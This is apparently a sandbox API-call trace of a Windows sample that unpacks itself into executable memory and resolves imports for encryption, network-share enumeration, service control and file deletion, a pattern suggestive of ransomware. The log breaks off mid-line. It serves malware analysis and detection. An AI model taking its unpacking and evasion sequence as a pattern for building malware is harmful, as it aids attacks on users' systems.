1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.719] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.719] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.719] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.719] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.719] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.719] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.719] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.719] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.719] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.719] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.719] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.719] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.719] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.719] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.719] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.719] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.719] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.719] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.719] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.719] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.719] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.719] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.719] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.719] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.719] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.719] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.719] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.719] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.719] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.972] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76c20000 [0022.972] GetProcAddress (hModule=0x76c20000, lpProcName="LocalAlloc") returned 0x76c3168c [0022.972] LocalAlloc (uFlags=0x0, uBytes=0x90f18) returned 0x210020 [0022.980] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0022.981] VirtualProtect (in: lpAddress=0x210020, dwSize=0x90f18, flNewProtect=0x40, lpflOldProtect=0x18fd4c | out: lpflOldProtect=0x18fd4c*=0x4) returned 1 [0023.017] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76c20000 [0023.018] GetProcAddress (hModule=0x76c20000, lpProcName="GlobalAlloc") returned 0x76c3588e [0023.019] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0023.019] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0023.019] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0023.019] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0023.019] GetProcAddress (hModule=0x76c20000, lpProcName="Module32First") returned 0x76cb5cd9 [0023.019] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0023.019] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x58 [0023.021] Module32First (hSnapshot=0x58, lpme=0x18ede0) returned 1 [0023.022] VirtualAlloc (lpAddress=0x0, dwSize=0x119e50, flAllocationType=0x1000, flProtect=0x40) returned 0x5b0000 [0023.057] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0023.057] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76c20000 [0023.057] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0023.057] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0023.057] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0023.057] GetProcAddress (hModule=0x76c20000, lpProcName="GetVersionExA") returned 0x76c33519 [0023.057] GetProcAddress (hModule=0x76c20000, lpProcName="TerminateProcess") returned 0x76c4d802 [0023.057] GetProcAddress (hModule=0x76c20000, lpProcName="ExitProcess") returned 0x76c37a10 [0023.057] GetProcAddress (hModule=0x76c20000, lpProcName="SetErrorMode") returned 0x76c31b00 [0023.057] SetErrorMode (uMode=0x400) returned 0x0 [0023.058] SetErrorMode (uMode=0x0) returned 0x400 [0023.058] GetVersionExA (in: lpVersionInformation=0x18dd10*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x3, dwPlatformId=0xffffffff, szCSDVersion="s}\x16w") | out: lpVersionInformation=0x18dd10*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0023.058] VirtualAlloc (lpAddress=0x0, dwSize=0x119000, flAllocationType=0x1000, flProtect=0x4) returned 0x1f60000 [0023.075] VirtualProtect (in: lpAddress=0x400000, dwSize=0x137000, flNewProtect=0x40, lpflOldProtect=0x18ed98 | out: lpflOldProtect=0x18ed98*=0x2) returned 1 [0023.281] VirtualFree (lpAddress=0x1f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0023.289] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x75ee0000 [0023.290] GetProcAddress (hModule=0x75ee0000, lpProcName="RpcStringFreeW") returned 0x75f01635 [0023.290] GetProcAddress (hModule=0x75ee0000, lpProcName="UuidCreate") returned 0x75eff48b [0023.290] GetProcAddress (hModule=0x75ee0000, lpProcName="UuidToStringW") returned 0x75f21ee5 [0023.290] GetProcAddress (hModule=0x75ee0000, lpProcName="RpcStringFreeA") returned 0x75f23fc5 [0023.290] GetProcAddress (hModule=0x75ee0000, lpProcName="UuidToStringA") returned 0x75f5d918 [0023.290] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x74b50000 [0023.395] GetProcAddress (hModule=0x74b50000, lpProcName="WNetOpenEnumW") returned 0x74b52f06 [0023.395] GetProcAddress (hModule=0x74b50000, lpProcName="WNetEnumResourceW") returned 0x74b53058 [0023.395] GetProcAddress (hModule=0x74b50000, lpProcName="WNetCloseEnum") returned 0x74b52dd6 [0023.395] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x753d0000 [0025.760] GetProcAddress (hModule=0x753d0000, lpProcName="InternetCloseHandle") returned 0x753eab49 [0025.760] GetProcAddress (hModule=0x753d0000, lpProcName="InternetReadFile") returned 0x753eb406 [0025.760] GetProcAddress (hModule=0x753d0000, lpProcName="InternetOpenUrlW") returned 0x7544be5c [0025.760] GetProcAddress (hModule=0x753d0000, lpProcName="InternetOpenW") returned 0x753f9197 [0025.760] GetProcAddress (hModule=0x753d0000, lpProcName="HttpQueryInfoW") returned 0x753f5c75 [0025.760] GetProcAddress (hModule=0x753d0000, lpProcName="InternetOpenA") returned 0x753ff18e [0025.760] GetProcAddress (hModule=0x753d0000, lpProcName="InternetOpenUrlA") returned 0x754130f1 [0025.760] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x74b10000 [0025.912] GetProcAddress (hModule=0x74b10000, lpProcName="timeGetTime") returned 0x74b126e0 [0025.912] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x75340000 [0025.912] GetProcAddress (hModule=0x75340000, lpProcName="PathAppendA") returned 0x7534d65e [0025.912] GetProcAddress (hModule=0x75340000, lpProcName="PathFindFileNameW") returned 0x7535bb71 [0025.912] GetProcAddress (hModule=0x75340000, lpProcName="PathRemoveFileSpecW") returned 0x75353248 [0025.912] GetProcAddress (hModule=0x75340000, lpProcName="PathFileExistsA") returned 0x7537ad1a [0025.912] GetProcAddress (hModule=0x75340000, lpProcName="PathFileExistsW") returned 0x753545bf [0025.913] GetProcAddress (hModule=0x75340000, lpProcName="PathAppendW") returned 0x753581ef [0025.913] GetProcAddress (hModule=0x75340000, lpProcName="PathFindExtensionW") returned 0x7535a1b9 [0025.913] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76c20000 [0025.913] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0025.913] GetProcAddress (hModule=0x76c20000, lpProcName="WriteFile") returned 0x76c31282 [0025.913] GetProcAddress (hModule=0x76c20000, lpProcName="GetDriveTypeA") returned 0x76c4ef75 [0025.913] GetProcAddress (hModule=0x76c20000, lpProcName="OpenProcess") returned 0x76c31986 [0025.913] GetProcAddress (hModule=0x76c20000, lpProcName="GlobalAlloc") returned 0x76c3588e [0025.913] GetProcAddress (hModule=0x76c20000, lpProcName="GetSystemDirectoryW") returned 0x76c35063 [0025.913] GetProcAddress (hModule=0x76c20000, lpProcName="WideCharToMultiByte") returned 0x76c3170d [0025.913] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryW") returned 0x76c3492b [0025.913] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0025.913] GetProcAddress (hModule=0x76c20000, lpProcName="CopyFileW") returned 0x76c5830d [0025.913] GetProcAddress (hModule=0x76c20000, lpProcName="FormatMessageW") returned 0x76c34620 [0025.914] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcpynW") returned 0x76c5d556 [0025.914] GetProcAddress (hModule=0x76c20000, lpProcName="CreateProcessA") returned 0x76c31072 [0025.914] GetProcAddress (hModule=0x76c20000, lpProcName="TerminateProcess") returned 0x76c4d802 [0025.914] GetProcAddress (hModule=0x76c20000, lpProcName="ReadFile") returned 0x76c33ed3 [0025.914] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileW") returned 0x76c33f5c [0025.914] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatA") returned 0x76c52b7a [0025.914] GetProcAddress (hModule=0x76c20000, lpProcName="GetEnvironmentVariableA") returned 0x76c333a0 [0025.914] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpW") returned 0x76c35929 [0025.914] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0025.914] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenW") returned 0x76c31700 [0025.914] GetProcAddress (hModule=0x76c20000, lpProcName="FlushFileBuffers") returned 0x76c3469b [0025.914] GetProcAddress (hModule=0x76c20000, lpProcName="GetShortPathNameA") returned 0x76c5594d [0025.914] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileSizeEx") returned 0x76c359e2 [0025.914] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0025.914] GetProcAddress (hModule=0x76c20000, lpProcName="SetLastError") returned 0x76c311a9 [0025.915] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0025.915] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0025.915] GetProcAddress (hModule=0x76c20000, lpProcName="MoveFileW") returned 0x76c49af0 [0025.915] GetProcAddress (hModule=0x76c20000, lpProcName="FindClose") returned 0x76c34442 [0025.915] GetProcAddress (hModule=0x76c20000, lpProcName="Process32FirstW") returned 0x76c58baf [0025.915] GetProcAddress (hModule=0x76c20000, lpProcName="LocalAlloc") returned 0x76c3168c [0025.915] GetProcAddress (hModule=0x76c20000, lpProcName="CreateEventW") returned 0x76c3183e [0025.915] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameA") returned 0x76c314b1 [0025.915] GetProcAddress (hModule=0x76c20000, lpProcName="Process32NextW") returned 0x76c5896c [0025.915] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatW") returned 0x76c5828e [0025.915] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexA") returned 0x76c34c6b [0025.915] GetProcAddress (hModule=0x76c20000, lpProcName="FindNextFileW") returned 0x76c354ee [0025.915] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0025.916] GetProcAddress (hModule=0x76c20000, lpProcName="SetEnvironmentVariableA") returned 0x76c3e331 [0025.916] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteFileW") returned 0x76c389b3 [0025.916] GetProcAddress (hModule=0x76c20000, lpProcName="LocalFree") returned 0x76c32d3c [0025.916] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcpyW") returned 0x76c53102 [0025.916] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteFileA") returned 0x76c35444 [0025.916] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcpyA") returned 0x76c52a9d [0025.916] GetProcAddress (hModule=0x76c20000, lpProcName="SetPriorityClass") returned 0x76c4cf28 [0025.916] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcess") returned 0x76c31809 [0025.916] GetProcAddress (hModule=0x76c20000, lpProcName="GetComputerNameW") returned 0x76c3dd0e [0025.916] GetProcAddress (hModule=0x76c20000, lpProcName="GetLogicalDrives") returned 0x76c35371 [0025.916] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameW") returned 0x76c34950 [0025.916] GetProcAddress (hModule=0x76c20000, lpProcName="SetStdHandle") returned 0x76cb454f [0025.916] GetProcAddress (hModule=0x76c20000, lpProcName="GetVersion") returned 0x76c34467 [0025.917] GetProcAddress (hModule=0x76c20000, lpProcName="CreateDirectoryA") returned 0x76c5d526 [0025.917] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThread") returned 0x76c334d5 [0025.917] GetProcAddress (hModule=0x76c20000, lpProcName="CompareStringW") returned 0x76c33bca [0025.917] GetProcAddress (hModule=0x76c20000, lpProcName="GetTimeFormatW") returned 0x76c4f481 [0025.917] GetProcAddress (hModule=0x76c20000, lpProcName="GetDateFormatW") returned 0x76c534d7 [0025.917] GetProcAddress (hModule=0x76c20000, lpProcName="EnumSystemLocalesW") returned 0x76cb425f [0025.917] GetProcAddress (hModule=0x76c20000, lpProcName="GetUserDefaultLCID") returned 0x76c33da5 [0025.917] GetProcAddress (hModule=0x76c20000, lpProcName="IsValidLocale") returned 0x76c4ce46 [0025.917] GetProcAddress (hModule=0x76c20000, lpProcName="GetLocaleInfoW") returned 0x76c33c42 [0025.917] GetProcAddress (hModule=0x76c20000, lpProcName="CreateSemaphoreW") returned 0x76c4ca5a [0025.917] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleW") returned 0x76c334b0 [0025.917] GetProcAddress (hModule=0x76c20000, lpProcName="GetTickCount") returned 0x76c3110c [0025.917] GetProcAddress (hModule=0x76c20000, lpProcName="TlsFree") returned 0x76c33587 [0025.918] GetProcAddress (hModule=0x76c20000, lpProcName="TlsSetValue") returned 0x76c314fb [0025.918] GetProcAddress (hModule=0x76c20000, lpProcName="TlsGetValue") returned 0x76c311e0 [0025.918] GetProcAddress (hModule=0x76c20000, lpProcName="TlsAlloc") returned 0x76c349ad [0025.918] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76c31916 [0025.918] GetProcAddress (hModule=0x76c20000, lpProcName="SetUnhandledExceptionFilter") returned 0x76c387c9 [0025.918] GetProcAddress (hModule=0x76c20000, lpProcName="UnhandledExceptionFilter") returned 0x76c5772f [0025.918] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleA") returned 0x76c31245 [0025.918] GetProcAddress (hModule=0x76c20000, lpProcName="GetVersionExA") returned 0x76c33519 [0025.918] GetProcAddress (hModule=0x76c20000, lpProcName="GlobalMemoryStatus") returned 0x76c38b6d [0025.919] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0025.919] GetProcAddress (hModule=0x76c20000, lpProcName="FlushConsoleInputBuffer") returned 0x76cd7a9f [0025.919] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForSingleObject") returned 0x76c31136 [0025.919] GetProcAddress (hModule=0x76c20000, lpProcName="CreateDirectoryW") returned 0x76c34259 [0025.919] GetProcAddress (hModule=0x76c20000, lpProcName="SetFilePointerEx") returned 0x76c4c807 [0025.919] GetProcAddress (hModule=0x76c20000, lpProcName="CreateProcessW") returned 0x76c3103d [0025.919] GetProcAddress (hModule=0x76c20000, lpProcName="FreeLibrary") returned 0x76c334c8 [0025.919] GetProcAddress (hModule=0x76c20000, lpProcName="SetErrorMode") returned 0x76c31b00 [0025.919] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0025.919] GetProcAddress (hModule=0x76c20000, lpProcName="SetFilePointer") returned 0x76c317d1 [0025.919] GetProcAddress (hModule=0x76c20000, lpProcName="FindFirstFileW") returned 0x76c34435 [0025.919] GetProcAddress (hModule=0x76c20000, lpProcName="SetConsoleMode") returned 0x76c4a77d [0025.919] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileA") returned 0x76c353c6 [0025.919] GetProcAddress (hModule=0x76c20000, lpProcName="GetCommandLineW") returned 0x76c35223 [0025.920] GetProcAddress (hModule=0x76c20000, lpProcName="GetNumberOfConsoleInputEvents") returned 0x76cd793f [0025.920] GetProcAddress (hModule=0x76c20000, lpProcName="PeekConsoleInputA") returned 0x76cd6f0d [0025.920] GetProcAddress (hModule=0x76c20000, lpProcName="FreeEnvironmentStringsW") returned 0x76c351cb [0025.920] GetProcAddress (hModule=0x76c20000, lpProcName="GetEnvironmentStringsW") returned 0x76c351e3 [0025.920] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0025.920] GetProcAddress (hModule=0x76c20000, lpProcName="QueryPerformanceCounter") returned 0x76c31725 [0025.920] GetProcAddress (hModule=0x76c20000, lpProcName="GetTimeZoneInformation") returned 0x76c3465a [0025.920] GetProcAddress (hModule=0x76c20000, lpProcName="RaiseException") returned 0x76c358a6 [0025.920] GetProcAddress (hModule=0x76c20000, lpProcName="GetStringTypeW") returned 0x76c31946 [0025.920] GetProcAddress (hModule=0x76c20000, lpProcName="GetConsoleCP") returned 0x76cd7bff [0025.920] GetProcAddress (hModule=0x76c20000, lpProcName="ReadConsoleW") returned 0x76cd739a [0025.920] GetProcAddress (hModule=0x76c20000, lpProcName="GetConsoleMode") returned 0x76c31328 [0025.920] GetProcAddress (hModule=0x76c20000, lpProcName="HeapSize") returned 0x77163002 [0025.920] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryExW") returned 0x76c3495d [0025.921] GetProcAddress (hModule=0x76c20000, lpProcName="OutputDebugStringW") returned 0x76c5d1d4 [0025.921] GetProcAddress (hModule=0x76c20000, lpProcName="SetConsoleCtrlHandler") returned 0x76c38a09 [0025.921] GetProcAddress (hModule=0x76c20000, lpProcName="RtlUnwind") returned 0x76c5d1c3 [0025.921] GetProcAddress (hModule=0x76c20000, lpProcName="FatalAppExitA") returned 0x76cb4691 [0025.921] GetProcAddress (hModule=0x76c20000, lpProcName="GetStartupInfoW") returned 0x76c34d40 [0025.921] GetProcAddress (hModule=0x76c20000, lpProcName="GetExitCodeProcess") returned 0x76c4174d [0025.921] GetProcAddress (hModule=0x76c20000, lpProcName="LCMapStringW") returned 0x76c317b9 [0025.921] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteCriticalSection") returned 0x771645f5 [0025.921] GetProcAddress (hModule=0x76c20000, lpProcName="AreFileApisANSI") returned 0x76cb40d1 [0025.921] GetProcAddress (hModule=0x76c20000, lpProcName="ExitProcess") returned 0x76c37a10 [0025.921] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0025.921] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0025.921] GetProcAddress (hModule=0x76c20000, lpProcName="GlobalFree") returned 0x76c35558 [0025.921] GetProcAddress (hModule=0x76c20000, lpProcName="SetEndOfFile") returned 0x76c4ce2e [0025.922] GetProcAddress (hModule=0x76c20000, lpProcName="ReadConsoleInputA") returned 0x76cd6f53 [0025.922] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0025.922] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0025.922] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0025.922] GetProcAddress (hModule=0x76c20000, lpProcName="EnterCriticalSection") returned 0x771522b0 [0025.922] GetProcAddress (hModule=0x76c20000, lpProcName="LeaveCriticalSection") returned 0x77152270 [0025.922] GetProcAddress (hModule=0x76c20000, lpProcName="GetStdHandle") returned 0x76c351b3 [0025.922] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileType") returned 0x76c33531 [0025.922] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleExW") returned 0x76c34a6f [0025.922] GetProcAddress (hModule=0x76c20000, lpProcName="WriteConsoleW") returned 0x76c57aca [0025.922] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0025.922] GetProcAddress (hModule=0x76c20000, lpProcName="DecodePointer") returned 0x77169d35 [0025.922] GetProcAddress (hModule=0x76c20000, lpProcName="GetSystemTimeAsFileTime") returned 0x76c33509 [0025.923] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0025.923] GetProcAddress (hModule=0x76c20000, lpProcName="IsProcessorFeaturePresent") returned 0x76c35235 [0025.923] GetProcAddress (hModule=0x76c20000, lpProcName="IsValidCodePage") returned 0x76c34493 [0025.923] GetProcAddress (hModule=0x76c20000, lpProcName="GetACP") returned 0x76c3179c [0025.923] GetProcAddress (hModule=0x76c20000, lpProcName="GetOEMCP") returned 0x76c5d1a1 [0025.923] GetProcAddress (hModule=0x76c20000, lpProcName="GetCPInfo") returned 0x76c35189 [0025.923] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThread") returned 0x76c317ec [0025.923] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThreadId") returned 0x76c31450 [0025.923] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0025.923] GetProcAddress (hModule=0x74f40000, lpProcName="PeekMessageW") returned 0x74f605ba [0025.923] GetProcAddress (hModule=0x74f40000, lpProcName="PostThreadMessageW") returned 0x74f58bff [0025.923] GetProcAddress (hModule=0x74f40000, lpProcName="DefWindowProcW") returned 0x771625dd [0025.923] GetProcAddress (hModule=0x74f40000, lpProcName="DispatchMessageW") returned 0x74f5787b [0025.923] GetProcAddress (hModule=0x74f40000, lpProcName="UpdateWindow") returned 0x74f63559 [0025.924] GetProcAddress (hModule=0x74f40000, lpProcName="CreateWindowExW") returned 0x74f58a29 [0025.924] GetProcAddress (hModule=0x74f40000, lpProcName="LoadCursorW") returned 0x74f588f7 [0025.924] GetProcAddress (hModule=0x74f40000, lpProcName="IsWindow") returned 0x74f57136 [0025.924] GetProcAddress (hModule=0x74f40000, lpProcName="ShowWindow") returned 0x74f60dfb [0025.924] GetProcAddress (hModule=0x74f40000, lpProcName="RegisterClassExW") returned 0x74f5b17d [0025.924] GetProcAddress (hModule=0x74f40000, lpProcName="PostQuitMessage") returned 0x74f59abb [0025.924] GetProcAddress (hModule=0x74f40000, lpProcName="GetMessageW") returned 0x74f578e2 [0025.924] GetProcAddress (hModule=0x74f40000, lpProcName="DestroyWindow") returned 0x74f59a55 [0025.924] GetProcAddress (hModule=0x74f40000, lpProcName="SendMessageW") returned 0x74f59679 [0025.924] GetProcAddress (hModule=0x74f40000, lpProcName="GetProcessWindowStation") returned 0x74f59eea [0025.924] GetProcAddress (hModule=0x74f40000, lpProcName="GetUserObjectInformationW") returned 0x74f58068 [0025.924] GetProcAddress (hModule=0x74f40000, lpProcName="MessageBoxA") returned 0x74fafd1e [0025.924] GetProcAddress (hModule=0x74f40000, lpProcName="GetDesktopWindow") returned 0x74f60a19 [0025.925] GetProcAddress (hModule=0x74f40000, lpProcName="MessageBoxW") returned 0x74fafd3f [0025.925] GetProcAddress (hModule=0x74f40000, lpProcName="TranslateMessage") returned 0x74f57809 [0025.925] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0025.925] GetProcAddress (hModule=0x74d40000, lpProcName="RegCloseKey") returned 0x74d5469d [0025.925] GetProcAddress (hModule=0x74d40000, lpProcName="CloseServiceHandle") returned 0x74d5369c [0025.925] GetProcAddress (hModule=0x74d40000, lpProcName="GetUserNameW") returned 0x74d5157a [0025.925] GetProcAddress (hModule=0x74d40000, lpProcName="ReportEventA") returned 0x74d43ee9 [0025.925] GetProcAddress (hModule=0x74d40000, lpProcName="RegisterEventSourceA") returned 0x74d52d46 [0025.925] GetProcAddress (hModule=0x74d40000, lpProcName="DeregisterEventSource") returned 0x74d535dd [0025.925] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0025.925] GetProcAddress (hModule=0x74d40000, lpProcName="RegSetValueExW") returned 0x74d514d6 [0025.925] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0025.925] GetProcAddress (hModule=0x74d40000, lpProcName="ControlService") returned 0x74d67144 [0025.925] GetProcAddress (hModule=0x74d40000, lpProcName="RegOpenKeyExW") returned 0x74d5468d [0025.926] GetProcAddress (hModule=0x74d40000, lpProcName="CryptCreateHash") returned 0x74d4df4e [0025.926] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0025.926] GetProcAddress (hModule=0x74d40000, lpProcName="CryptImportKey") returned 0x74d4c532 [0025.926] GetProcAddress (hModule=0x74d40000, lpProcName="QueryServiceStatus") returned 0x74d52a86 [0025.926] GetProcAddress (hModule=0x74d40000, lpProcName="RegQueryValueExW") returned 0x74d546ad [0025.926] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0025.926] GetProcAddress (hModule=0x74d40000, lpProcName="OpenServiceW") returned 0x74d4ca4c [0025.926] GetProcAddress (hModule=0x74d40000, lpProcName="OpenSCManagerW") returned 0x74d4ca64 [0025.926] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextW") returned 0x74d4df14 [0025.926] GetProcAddress (hModule=0x74d40000, lpProcName="CryptGetHashParam") returned 0x74d4df7e [0025.926] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75fd0000 [0027.540] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetPathFromIDListW") returned 0x760617bf [0027.540] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetSpecialFolderLocation") returned 0x7605e141 [0027.541] GetProcAddress (hModule=0x75fd0000, lpProcName="ShellExecuteA") returned 0x76217078 [0027.541] GetProcAddress (hModule=0x75fd0000, lpProcName="ShellExecuteExW") returned 0x75ff1e46 [0027.541] GetProcAddress (hModule=0x75fd0000, lpProcName="CommandLineToArgvW") returned 0x75fe9ee8 [0027.541] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathA") returned 0x760e7804 [0027.541] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x755e0000 [0027.541] GetProcAddress (hModule=0x755e0000, lpProcName="CoInitialize") returned 0x755fb636 [0027.541] GetProcAddress (hModule=0x755e0000, lpProcName="CoInitializeSecurity") returned 0x75607259 [0027.541] GetProcAddress (hModule=0x755e0000, lpProcName="CoUninitialize") returned 0x756286d3 [0027.541] GetProcAddress (hModule=0x755e0000, lpProcName="CoCreateInstance") returned 0x75629d0b [0027.541] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x75220000 [0027.541] GetProcAddress (hModule=0x75220000, lpProcName=0x6) returned 0x75223e59 [0027.541] GetProcAddress (hModule=0x75220000, lpProcName=0x8) returned 0x75223ed5 [0027.542] GetProcAddress (hModule=0x75220000, lpProcName=0x9) returned 0x75223eae [0027.542] GetProcAddress (hModule=0x75220000, lpProcName=0xc8) returned 